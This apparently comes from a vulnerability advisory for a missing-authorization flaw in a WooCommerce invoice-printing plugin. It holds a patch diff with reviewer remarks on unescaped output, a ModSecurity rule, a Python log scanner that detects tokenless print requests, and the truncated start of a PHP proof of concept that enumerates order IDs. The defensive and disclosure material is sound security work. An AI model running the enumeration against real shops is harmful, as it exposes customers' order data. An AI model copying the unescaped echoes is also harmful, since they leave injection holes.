@@ -36,7 +36,7 @@
 		 *
 		 * @var string $plugin_version Current plugin version number
 		 */
-		public static $plugin_version = '5.9.0';
+		public static $plugin_version = '6.0.0';

 		/**
 		 * Plugin URL on current installation
@@ -154,7 +154,7 @@
 		 * Define WC Constants.
 		 */
 		private function define_constants() {
-			self::$plugin_basefile_path = dirname( dirname( __FILE__ ) ) . '/woocommerce-delivery-notes.php';
+			self::$plugin_basefile_path = dirname( dirname( __FILE__ ) ) . '/woocommerce-delivery-notes.php'; // phpcs:ignore
 			self::$plugin_basefile      = plugin_basename( self::$plugin_basefile_path );
 			self::$plugin_url           = plugin_dir_url( self::$plugin_basefile );
 			self::$plugin_path          = trailingslashit( dirname( self::$plugin_basefile_path ) );
@@ -270,6 +270,7 @@
 		 * @since 5.0
 		 */
 		public function wcdn_create_dir() {
+			// phpcs:disable
 			$is_action_scheduled = as_next_scheduled_action( 'wcdn_delete_file' );
 			if ( false === $is_action_scheduled ) {
 				as_schedule_recurring_action( time(), 86400, 'wcdn_delete_file' );
--- a/woocommerce-delivery-notes/includes/component/woocommerce-check/ts-woo-active.php
+++ b/woocommerce-delivery-notes/includes/component/woocommerce-check/ts-woo-active.php
@@ -2,7 +2,7 @@
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }
-
+// phpcs:disable
 /**
  * WCDN_TS_Woo_Active Class
  *
--- a/woocommerce-delivery-notes/includes/wcdn-all-component.php
+++ b/woocommerce-delivery-notes/includes/wcdn-all-component.php
@@ -1,47 +1,41 @@
 <?php
 /**
  * It will Add all the Boilerplate component when we activate the plugin.
+ *
  * @author  Tyche Softwares
- *
+ * @package WooCommerceDeliveryNotes
  */
+// phpcs:disable
 if ( ! defined( 'ABSPATH' ) ) {
     exit; // Exit if accessed directly.
 }
 if ( ! class_exists( 'WCDN_Component' ) ) {
 	/**
 	 * It will Add all the Boilerplate component when we activate the plugin.
-	 *
+	 *
 	 */
 	class WCDN_Component {
-
 		/**
 		 * It will Add all the Boilerplate component when we activate the plugin.
 		 */
 		public function __construct() {
-
 			$is_admin = is_admin();
-
 			if ( true === $is_admin ) {
                 require_once( "component/woocommerce-check/ts-woo-active.php" );
-
-                $wcdn_plugin_name          = self::ts_get_plugin_name();;
-                $wcdn_locale               = self::ts_get_plugin_locale();
-
-                $wcdn_file_name            = 'woocommerce-delivery-notes/woocommerce-delivery-notes.php';
-                $wcdn_plugin_prefix        = 'wcdn';
-                $wcdn_lite_plugin_prefix   = 'wcdn';
-                $wcdn_plugin_folder_name   = 'woocommerce-delivery-notes/';
-                $wcdn_plugin_dir_name      = dirname ( untrailingslashit( plugin_dir_path ( __FILE__ ) ) ) . '/woocommerce-delivery-notes.php' ;
-                $wcdn_plugin_url           = dirname ( untrailingslashit( plugins_url( '/', __FILE__ ) ) );
+                $wcdn_plugin_name        = self::ts_get_plugin_name();;
+                $wcdn_locale             = self::ts_get_plugin_locale();
+                $wcdn_file_name          = 'woocommerce-delivery-notes/woocommerce-delivery-notes.php';
+                $wcdn_plugin_prefix      = 'wcdn';
+                $wcdn_lite_plugin_prefix = 'wcdn';
+                $wcdn_plugin_folder_name = 'woocommerce-delivery-notes/';
+                $wcdn_plugin_dir_name    = dirname( untrailingslashit( plugin_dir_path( __FILE__ ) ) ) . '/woocommerce-delivery-notes.php' ;
+                $wcdn_plugin_url         = dirname( untrailingslashit( plugins_url( '/', __FILE__ ) ) );

                 $wcdn_get_previous_version = get_option( 'wcdn_version', '1' );
-
                 $wcdn_blog_post_link       = 'https://www.tychesoftwares.com/docs/docs/woocommerce-print-invoice-delivery-note/usage-tracking/';
-
                 $wcdn_plugins_page         = '';
                 $wcdn_plugin_slug          = '';
                 $wcdn_pro_file_name        = '';
-
                 $wcdn_settings_page        = 'admin.php?page=wc-settings&tab=wcdn-settings';

                 if ( strpos( $_SERVER['REQUEST_URI'], 'plugins.php' ) !== false || strpos( $_SERVER['REQUEST_URI'], 'action=deactivate' ) !== false || ( strpos( $_SERVER['REQUEST_URI'], 'admin-ajax.php' ) !== false && isset( $_POST['action'] ) && $_POST['action'] === 'tyche_plugin_deactivation_submit_action' ) ) { //phpcs:ignore
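Review bot: the `// phpcs:disable` added under the file docblock switches off every sniff for the whole file with no `phpcs:enable`, so the realigned line `$wcdn_plugin_name = self::ts_get_plugin_name();;` still carries its double semicolon and the `$_SERVER['REQUEST_URI']` and `$_POST['action']` reads at the end of the hunk go unchecked. Drop the blanket disable, fix the `;;`, and suppress only named sniffs on the lines that need it.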
@@ -94,13 +88,12 @@
          * @return string $ts_plugin_domain Name of the Plugin domain
          */
         public static function ts_get_plugin_locale () {
-            $ordd_plugin_dir =  dirname ( dirname ( __FILE__ ) );
+            $ordd_plugin_dir  =  dirname ( dirname( __FILE__ ) );
             $ordd_plugin_dir .= '/woocommerce-delivery-notes.php';
-
             $ts_plugin_domain = '';
-            $plugin_data = get_file_data( $ordd_plugin_dir, array( 'domain' => 'Text Domain' ) );
+            $plugin_data      = get_file_data( $ordd_plugin_dir, array( 'domain' => 'Text Domain' ) );
             if ( ! empty( $plugin_data['domain'] ) ) {
-                $ts_plugin_domain = $plugin_data[ 'domain' ];
+                $ts_plugin_domain = $plugin_data['domain'];
             }
             return $ts_plugin_domain;
         }
@@ -108,12 +101,10 @@
 		/**
          * It will contain all the FAQ which need to be display on the FAQ page.
          * @return array $ts_faq All questions and answers.
-         *
+         *
          */
         public static function wcdn_get_faq () {
-
             $ts_faq = array ();
-
             $ts_faq = array(
                 1 => array (
                         'question' => 'It prints the 404 page instead of the order, how to correct that?',
--- a/woocommerce-delivery-notes/includes/wcdn-template-functions.php
+++ b/woocommerce-delivery-notes/includes/wcdn-template-functions.php
@@ -213,7 +213,7 @@
 	$template_type_option                                     = get_option( 'wcdn_template_type' );
 	$setting['template_setting']['template_setting_template'] = false !== $template_type_option ? $template_type_option : 'default';

-	if ( isset( $setting['template_setting']['template_setting_template'] ) && 'simple' == $setting['template_setting']['template_setting_template'] ) {
+	if ( isset( $setting['template_setting']['template_setting_template'] ) && 'simple' == $setting['template_setting']['template_setting_template'] ) { // phpcs:ignore
 		if ( 'order' === $template_type ) {
 			$turl = 'print-content.php'; // Apply this for 'order' template if it's 'simple'.
 		} else {
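Review bot: The `// phpcs:ignore` added to the `'simple' == $setting['template_setting']['template_setting_template']` condition silences every sniff on that line in order to keep a loose comparison. The value is assigned one line earlier from `get_option( 'wcdn_template_type' )` with a `'default'` fallback, so `'simple' === ...` is the safer form and needs no suppression; the `isset()` is also redundant directly after that assignment. If the loose comparison has to stay, name the specific sniff being ignored rather than ignoring the whole line.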
@@ -264,7 +264,7 @@
 /**
  * Show pdf logo html
  *
- * @param string $type pdf type.
+ * @param string $ttype pdf type.
  */
 function wcdn_pdf_company_logo( $ttype ) {
 	global $wcdn;
@@ -413,7 +413,7 @@
 				'color'       => $data['invoice_number']['invoice_number_text_colour'],
 				'active'      => 'yes',
 			);
-		} else {
+		} else { // phpcs:ignore
 			if ( 'invoice' === wcdn_get_template_type() || 'order' === wcdn_get_template_type() ) {
 				$fields['invoice_number'] = array(
 					'label' => __( 'Invoice Number', 'woocommerce-delivery-notes' ),
@@ -559,7 +559,7 @@
  * @param object $product Product Object.
  * @param object $order Order object.
  */
-function wcdn_additional_product_fields( $fields, $product, $order ) {
+function wcdn_additional_product_fields( $fields, $product, $order ) { // phpcs:ignore
 	$new_fields = array();

 	// Stock keeping unit.
@@ -579,7 +579,7 @@
  * @param object $order Order object.
  * @return boolean true
  */
-function wcdn_has_shipping_address( $order ) {
+function wcdn_has_shipping_address( $order ) { // phpcs:ignore
 	return true;
 }

@@ -715,7 +715,7 @@
  * @param array  $total_rows Rows array.
  * @param object $order Order object.
  */
-function wcdn_remove_semicolon_from_totals( $total_rows, $order ) {
+function wcdn_remove_semicolon_from_totals( $total_rows, $order ) { // phpcs:ignore
 	foreach ( $total_rows as $key => $row ) {
 		$label = $row['label'];
 		$colon = strrpos( $label, ':' );
@@ -733,7 +733,7 @@
  * @param array  $total_rows Rows array.
  * @param object $order Order object.
  */
-function wcdn_remove_payment_method_from_totals( $total_rows, $order ) {
+function wcdn_remove_payment_method_from_totals( $total_rows, $order ) { // phpcs:ignore
 	unset( $total_rows['payment_method'] );
 	unset( $total_rows['refund_0'] );
 	return $total_rows;
@@ -833,8 +833,8 @@
 	// Check if Product Input Field Lite is active.
 	$product_input_field = 'product-input-fields-for-woocommerce/product-input-fields-for-woocommerce.php';

-	if ( ( in_array( $product_input_field_pro, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field_pro, get_site_option( 'active_sitewide_plugins', array() ) ) )
-	) || ( in_array( $product_input_field, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field, get_site_option( 'active_sitewide_plugins', array() ) ) )
+	if ( ( in_array( $product_input_field_pro, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field_pro, get_site_option( 'active_sitewide_plugins', array() ) ) ) // phpcs:ignore
+	) || ( in_array( $product_input_field, apply_filters( 'active_plugins', get_option( 'active_plugins', array() ) ) ) || ( is_multisite() && array_key_exists( $product_input_field, get_site_option( 'active_sitewide_plugins', array() ) ) ) // phpcs:ignore
 	) ) {

 		$pif_global_fields = $item->get_meta( '_alg_wc_pif_global', true );
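Review bot: Both `in_array()` calls in the changed condition still omit the third `true` argument, and the new `// phpcs:ignore` comments hide that instead of fixing it. Plugin basenames are strings, so adding `true` is a drop-in change. Reading the `active_plugins` and `active_sitewide_plugins` lists into local variables first would shorten the condition enough that no suppression is needed.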
@@ -1045,7 +1045,7 @@
  * @param WC_Order $order The WooCommerce order object.
  * @param array    $data  The checkout data.
  */
-function wcdn_add_guest_access_token_to_order( $order, $data ) {
+function wcdn_add_guest_access_token_to_order( $order, $data ) { // phpcs:ignore
 	if ( ! is_user_logged_in() ) {
 		wcdn_add_guest_access_token( $order );
 	}
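Review bot: `wcdn_add_guest_access_token_to_order()` calls `wcdn_add_guest_access_token( $order )` only when `! is_user_logged_in()`, so orders placed by logged-in customers carry no token. Please say in the docblock that those orders have to be authorized by ownership or capability on the print path, so a later change does not read a missing token as "no check required". The blanket `// phpcs:ignore` for the unused `$data` argument should name the sniff it suppresses.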
--- a/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
@@ -21,13 +21,13 @@
 		<div class="content">
 			<div class="page-header">
 			<?php
-				if ( isset( $data['company_logo']['active'] ) ) {
-					?>
+			if ( isset( $data['company_logo']['active'] ) ) {
+				?>
 					<div class="company-logo">
 						<?php
 						if ( wcdn_get_company_logo_id() ) :
 							?>
-							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 						<?php endif; ?>
 					</div>
 				<?php } ?>
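Review bot: In `wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>` the argument is an assignment expression, which leaves a stray `$ttype` variable in template scope. Pass the literal, `wcdn_pdf_company_logo( 'simple' )`, and the suppression is no longer needed. The same call is suppressed the same way in the other template hunks of this patch.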
@@ -183,13 +183,11 @@
 					<thead>
 						<tr>
 							<th class="head-name"><span><?php esc_attr_e( 'Product', 'woocommerce-delivery-notes' ); ?></span></th>
-							<?php
-							if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+							<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 								<th class="head-item-price"><span><?php esc_attr_e( 'Price', 'woocommerce-delivery-notes' ); ?></span></th>
 							<?php } ?>
 							<th class="head-quantity"><span><?php esc_attr_e( 'Quantity', 'woocommerce-delivery-notes' ); ?></span></th>
-							<?php
-							if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+							<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 								<th class="head-price"><span><?php esc_attr_e( 'Total', 'woocommerce-delivery-notes' ); ?></span></th>
 							<?php } ?>
 						</tr>
@@ -227,8 +225,7 @@
 										<?php wcdn_get_product_name( $product, $order, $item ); ?>
 										<?php do_action( 'wcdn_order_item_after', $product, $order, $item ); ?>
 									</td>
-									<?php
-									if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+									<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 										<td class="product-item-price">
 											<span><?php echo wp_kses_post( wcdn_get_formatted_item_price( $order, $item ) ); ?></span>
 										</td>
@@ -236,8 +233,7 @@
 									<td class="product-quantity">
 										<span><?php echo esc_attr( apply_filters( 'wcdn_order_item_quantity', $adjusted_qty, $item ) ); ?></span>
 									</td>
-									<?php
-									if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+									<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 										<td class="product-price">
 											<span><?php echo wp_kses_post( $order->get_formatted_line_subtotal( $item ) ); ?></span>
 										</td>
--- a/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
@@ -20,14 +20,10 @@
 	<body>
 		<div class="content">
 			<div class="page-header">
-			<?php
-				if ( isset( $data['company_logo']['active'] ) ) {
-					?>
+			<?php if ( isset( $data['company_logo']['active'] ) ) { ?>
 					<div class="company-logo">
-						<?php
-						if ( wcdn_get_company_logo_id() ) :
-							?>
-							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+						<?php if ( wcdn_get_company_logo_id() ) : ?>
+							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 						<?php endif; ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
@@ -22,14 +22,12 @@
 	<body>
 		<div class="content">
 			<div class="page-header">
-			<?php
-				if ( isset( $data['company_logo']['active'] ) ) {
-					?>
+			<?php if ( isset( $data['company_logo']['active'] ) ) { ?>
 					<div class="company-logo">
 						<?php
 						if ( wcdn_get_company_logo_id() ) :
 							?>
-							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+							<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 						<?php endif; ?>
 					</div>
 				<?php } ?>
@@ -154,13 +152,12 @@

 					// Specify watermark text.
 					$text = $data['payment_received_stamp']['payment_received_stamp_text'];
-
 					?>
 					<div class="order-stamp-container">
-						<?php echo $text; ?>
+						<?php echo $text; // phpcs:ignore?>
 					</div>
 					<?php
-				}
+				}
 				?>
 				<ul class="info-list">
 					<?php
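Review bot: `<?php echo $text; // phpcs:ignore?>` prints `$data['payment_received_stamp']['payment_received_stamp_text']` without escaping, and the added comment silences the output-escaping warning instead of resolving it. For a stamp label, `echo esc_html( $text );` is the expected form, or `wp_kses_post( $text )` if markup is intended, which is what the item price cells in these templates already use.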
--- a/woocommerce-delivery-notes/templates/print-order/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/print-content.php
@@ -19,7 +19,7 @@
 				if ( 'default' === $template_save ) {
 					wcdn_company_logo();
 				} elseif ( 'simple' === $template_save ) {
-					wcdn_pdf_company_logo( $ttype = 'simple' );
+					wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore
 				}
 			endif;
 			?>
@@ -154,7 +154,7 @@
 									</span>

 									<?php
-									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item  );
+									$item_meta_fields = apply_filters( 'wcdn_product_meta_data', $item['item_meta'], $item );
 									if ( null === $item_meta_fields ) {
 										$item_meta_fields = array();
 									}
@@ -166,7 +166,7 @@
 											$product_addons = WC_Product_Addons_Helper::get_product_addons( $product_id );
 										}
 									}
-                  // --- handle YITH add-ons: print labels and remove raw ywapo-* meta to avoid duplicates ---
+									// --- handle YITH add-ons: print labels and remove raw ywapo-* meta to avoid duplicates ---
 									$yith_addon_meta_map = array();
 									if ( isset( $item_meta_fields['_ywapo_meta_data'] ) && is_array( $item_meta_fields['_ywapo_meta_data'] ) ) {
 										foreach ( $item_meta_fields['_ywapo_meta_data'] as $group ) {
@@ -192,7 +192,7 @@
 										foreach ( $yith_addon_meta_map as $meta_key => $addon ) {
 											if ( isset( $addon['display_label'] ) && isset( $addon['display_value'] ) ) {
 												echo '<br><strong>' . esc_html( $addon['display_label'] ) . ' : </strong>' . wp_kses_post( $addon['display_value'] );
-											} else {
+											} else { // phpcs:ignore
 												if ( isset( $item_meta_fields[ $meta_key ] ) ) {
 													echo '<br><strong>' . esc_html( $meta_key ) . ' : </strong>' . wp_kses_post( $item_meta_fields[ $meta_key ] );
 												}
@@ -202,7 +202,7 @@
 											}
 										}
 									} // --- end handle YITH add-ons ---
-                  // Extra Product Options (ThemeComplete EPO) support.
+									// Extra Product Options (ThemeComplete EPO) support.
 									$epo_data = $item->get_meta( '_tmcartepo_data', true );
 									if ( ! empty( $epo_data ) && is_array( $epo_data ) ) {
 										foreach ( $epo_data as $epo ) {
--- a/woocommerce-delivery-notes/templates/print-order/simple/deliverynote/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/simple/deliverynote/print-content.php
@@ -19,7 +19,7 @@
 			<?php
 			if ( wcdn_get_company_logo_id() ) :
 				?>
-				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 			<?php endif; ?>
 		</div>
 	<?php } ?>
@@ -174,13 +174,11 @@
 		<thead>
 			<tr>
 				<th class="head-name"><span><?php esc_attr_e( 'Product', 'woocommerce-delivery-notes' ); ?></span></th>
-				<?php
-				if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+				<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 					<th class="head-item-price"><span><?php esc_attr_e( 'Price', 'woocommerce-delivery-notes' ); ?></span></th>
 				<?php } ?>
 				<th class="head-quantity"><span><?php esc_attr_e( 'Quantity', 'woocommerce-delivery-notes' ); ?></span></th>
-				<?php
-				if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+				<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 					<th class="head-price"><span><?php esc_attr_e( 'Total', 'woocommerce-delivery-notes' ); ?></span></th>
 				<?php } ?>
 			</tr>
@@ -218,8 +216,7 @@
 							<?php wcdn_get_product_name( $product, $order, $item ); ?>
 							<?php do_action( 'wcdn_order_item_after', $product, $order, $item ); ?>
 						</td>
-						<?php
-						if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+						<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>
 							<td class="product-item-price">
 								<span><?php echo wp_kses_post( wcdn_get_formatted_item_price( $order, $item ) ); ?></span>
 							</td>
@@ -227,8 +224,8 @@
 						<td class="product-quantity">
 							<span><?php echo esc_attr( apply_filters( 'wcdn_order_item_quantity', $adjusted_qty, $item ) ); ?></span>
 						</td>
-						<?php
-						if( isset( $data['display_price_product_table']['active'] ) ) { ?>
+						<?php
+						if( isset( $data['display_price_product_table']['active'] ) ) { // phpcs:ignore?>
 							<td class="product-price">
 								<span><?php echo wp_kses_post( $order->get_formatted_line_subtotal( $item ) ); ?></span>
 							</td>
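Review bot: The replacement lines keep `if( isset( ... ) ) {` on its own line and add `// phpcs:ignore`, while the previous hunk in this same file rewrites the identical construct to `<?php if ( isset( $data['display_price_product_table']['active'] ) ) { ?>`. Apply the same rewrite here and drop the suppression so the file stays consistent.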
@@ -291,8 +288,8 @@
 		?>
 		<style>
 			.order-thanks p {
-				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="personal_note">
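Review bot: The `color:` and `font-size:` values in this `<style>` block are echoed straight from `$data['complimentary_close'][...]`, and `// phpcs:ignore` now hides the escaping warning on both lines. Validate the values for the CSS context instead, for example `sanitize_hex_color()` if the colour is stored as a hex value and a numeric-plus-unit check for the size, so a stored setting cannot terminate the declaration or the `<style>` element. The `.colophon-policies` hunk that follows has the same issue.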
@@ -308,8 +305,8 @@
 		?>
 		<style>
 			.colophon-policies p {
-				color: <?php echo $data['policies']['policies_text_colour']; ?>;
-				font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+				color: <?php echo $data['policies']['policies_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['policies']['policies_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="colophon-policies">
--- a/woocommerce-delivery-notes/templates/print-order/simple/invoice/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/simple/invoice/print-content.php
@@ -20,7 +20,7 @@
 			<?php
 			if ( wcdn_get_company_logo_id() ) :
 				?>
-				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); ?>
+				<?php wcdn_pdf_company_logo( $ttype = 'simple' ); // phpcs:ignore?>
 			<?php endif; ?>
 		</div>
 	<?php } ?>
@@ -275,8 +275,8 @@
 		?>
 		<style>
 			.order-thanks p {
-				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="personal_note">
@@ -292,8 +292,8 @@
 		?>
 		<style>
 			.colophon-policies p {
-				color: <?php echo $data['policies']['policies_text_colour']; ?>;
-				font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+				color: <?php echo $data['policies']['policies_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['policies']['policies_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="colophon-policies">
--- a/woocommerce-delivery-notes/templates/print-order/simple/receipt/print-content.php
+++ b/woocommerce-delivery-notes/templates/print-order/simple/receipt/print-content.php
@@ -22,7 +22,7 @@
 			<?php
 			if ( wcdn_get_company_logo_id() ) :
 				?>
-				<?php wcdn_pdf_company_logo( $ttype = 'simple'); ?>
+				<?php wcdn_pdf_company_logo( $ttype = 'simple'); // phpcs:ignore ?>
 			<?php endif; ?>
 		</div>
 	<?php } ?>
@@ -150,7 +150,7 @@

 		?>
 		<div class="order-stamp-container">
-			<?php echo $text; ?>
+			<?php echo $text; // phpcs:ignore?>
 		</div>
 		<?php
 	}
@@ -290,8 +290,8 @@
 		?>
 		<style>
 			.order-thanks p {
-				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+				color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="personal_note">
@@ -307,8 +307,8 @@
 		?>
 		<style>
 			.colophon-policies p {
-				color: <?php echo $data['policies']['policies_text_colour']; ?>;
-				font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+				color: <?php echo $data['policies']['policies_text_colour']; // phpcs:ignore?>;
+				font-size: <?php echo $data['policies']['policies_font_size']; // phpcs:ignore?>;
 			}
 		</style>
 		<div class="colophon-policies">
--- a/woocommerce-delivery-notes/woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/woocommerce-delivery-notes.php
@@ -5,7 +5,7 @@
  * Plugin Name: Print Invoice & Delivery Notes for WooCommerce
  * Plugin URI: https://www.tychesoftwares.com/
  * Description: Print Invoices & Delivery Notes for WooCommerce Orders.
- * Version: 5.9.0
+ * Version: 6.0.0
  * Author: Tyche Softwares
  * Author URI: https://www.tychesoftwares.com/
  * License: GPLv3 or later
@@ -60,7 +60,7 @@
 	 */
 	add_action(
 		'before_woocommerce_init',
-		function() {
+		function () {
 			if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
 				AutomatticWooCommerceUtilitiesFeaturesUtil::declare_compatibility( 'custom_order_tables', 'woocommerce-delivery-notes/woocommerce-delivery-notes.php', true );
 				AutomatticWooCommerceUtilitiesFeaturesUtil::declare_compatibility( 'orders_cache', 'woocommerce-delivery-notes/woocommerce-delivery-notes.php', true );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-25317
SecRule REQUEST_URI "@rx ^/(?:index\.php)?" \
  "id:100025317,phase:2,deny,status:403,chain,msg:'CVE-2026-25317 - Print Invoice & Delivery Notes for WooCommerce Missing Authorization Exploit Attempt',severity:'CRITICAL',tag:'CVE-2026-25317',tag:'WordPress',tag:'WooCommerce',tag:'Plugin/Print-Invoice-Delivery-Notes'"
  SecRule ARGS_GET:action "@streq print" "chain"
    SecRule ARGS_GET:print-order "@rx ^[0-9]+$" "chain"
      SecRule &ARGS_GET:guest_token "@eq 0" \
        "t:none,setvar:'tx.cve_2026_25317_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
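
The conditions the rule above tests (`action=print`, a numeric `print-order`, no `guest_token`) can also be run over existing access logs to see whether tokenless print requests were already served before the rule or the 6.0.0 update was in place. This is an added example, not Atomic Edge's or the plugin's code; it assumes Combined Log Format, and the function names, the threshold and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed); only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def match_print_request(line):
    """Return (ip, order_id, status) if the request meets the rule's conditions:
    action=print, a numeric print-order, and no guest_token argument."""
    m = LOG_RE.match(line)
    if not m:
        return None
    args = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    if "print" not in args.get("action", []):
        return None
    orders = [v for v in args.get("print-order", []) if re.fullmatch(r"[0-9]+", v)]
    if not orders or "guest_token" in args:
        return None
    return m["ip"], int(orders[0]), int(m["status"])


def summarize(lines, min_distinct_orders=3):
    """Group matching requests per client IP.

    Access logs carry no session state, so a single tokenless request may be a
    logged-in customer. The threshold (an assumption, tune per site) marks
    clients that request several different order IDs.
    """
    per_ip = defaultdict(lambda: {"requested": set(), "served": set()})
    for line in lines:
        hit = match_print_request(line)
        if hit is None:
            continue
        ip, order, status = hit
        per_ip[ip]["requested"].add(order)
        if status == 200:
            per_ip[ip]["served"].add(order)
    return {
        ip: {
            "orders_requested": sorted(d["requested"]),
            "orders_served": sorted(d["served"]),
            "enumeration_suspected": len(d["requested"]) >= min_distinct_orders,
        }
        for ip, d in per_ip.items()
    }


# Constructed sample lines (documentation IP ranges, made-up order IDs).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2026:10:01:02 +0000] "GET /?print-order=101&action=print HTTP/1.1" 200 18234 "-" "-"',
    '203.0.113.7 - - [18/Mar/2026:10:01:03 +0000] "GET /?print-order=102&action=print HTTP/1.1" 200 17990 "-" "-"',
    '203.0.113.7 - - [18/Mar/2026:10:01:04 +0000] "GET /?print-order=103&action=print&print-order-type=invoice HTTP/1.1" 404 512 "-" "-"',
    '198.51.100.20 - - [18/Mar/2026:10:05:00 +0000] "GET /?print-order=55&action=print&guest_token=CONSTRUCTED-TOKEN HTTP/1.1" 200 18001 "-" "-"',
    '192.0.2.9 - - [18/Mar/2026:10:06:00 +0000] "GET /my-account/?print-order=77&action=print HTTP/1.1" 200 18100 "-" "-"',
    '192.0.2.9 - - [18/Mar/2026:10:06:05 +0000] "GET /shop/?action=print HTTP/1.1" 200 9000 "-" "-"',
    '192.0.2.44 - - [18/Mar/2026:10:07:00 +0000] "GET /?print-order=abc&action=print HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info)
```

Orders listed under `orders_served` for a flagged client are the ones whose documents were returned with a 200 and are the starting point for assessing what customer data was exposed.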

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25317 - Print Invoice & Delivery Notes for WooCommerce <= 5.9.0 - Missing Authorization

$target_url = 'https://vulnerable-site.com';

// Function to test order ID enumeration
function test_order_id($order_id) {
    global $target_url;
    
    // Construct the exploit URL
